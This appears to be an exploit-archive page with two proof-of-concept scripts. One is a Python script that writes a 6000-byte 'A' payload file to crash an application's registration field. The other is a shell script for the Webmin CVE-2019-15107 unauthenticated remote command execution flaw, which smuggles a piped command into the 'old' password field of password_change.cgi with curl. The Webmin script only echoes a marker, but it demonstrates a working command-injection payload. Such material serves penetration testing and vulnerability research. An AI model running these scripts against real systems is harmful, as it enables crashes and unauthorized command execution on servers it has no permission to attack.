# 5.- Click 'OK' and the application crashes.



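#!/usr/bin/env python
# 6000 'A' bytes for the registration field; far more than it expects, which
# is what triggers the crash.  The "\x41" escape was restored: the rendering
# had dropped the backslash, which would have produced an 18000-byte "x41x41..."
# string instead.
buffer = "\x41" * 6000

try:
    # Text mode is fine: the payload has no newlines to translate.  The
    # with-block closes the file even if the write fails.
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError) as exc:
    # Only file-system errors are expected here; anything else should surface.
    print("File cannot be created: %s" % exc)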


Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.

MD5 | d3f8ab6c772881a15aae824b15be9760

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauthenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script injects an "echo <flag>" command through the "old" password field of password_change.cgi and greps the response for the flag; if the flag comes back, the target executed the command and is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

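# Marker that only appears in the response if the injected command ran.
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI="$1"

# Refuse to run without a base URL instead of probing a relative path.
if [ -z "$URI" ]; then
    echo "Usage: $0 https://target:port" >&2
    exit 2
fi

# printf rather than "echo -n" / echo with escapes: neither is portable in sh.
printf 'Testing for RCE (CVE-2019-15107) on %s: ' "$URI"

# On vulnerable builds the "old" password field reaches a shell, so the
# appended "|echo $FLAG" makes the server echo the marker back.
# -k: Webmin normally runs with a self-signed certificate; -s: no progress
# output; --max-time 20: do not hang forever on a target that never answers.
if curl -ks --max-time 20 "$URI/password_change.cgi" \
        -d "user=wheel&pam=&expired=2&old=id|echo $FLAG&new1=wheel&new2=wheel" \
        -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -H "Referer: $URI/session_login.cgi" \
    | grep -q "$FLAG"
then
    printf '\033[0;31mVULNERABLE!\033[0m\n'
else
    printf '\033[0;32mOK! (target is not vulnerable)\033[0m\n'
fi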
#EOF
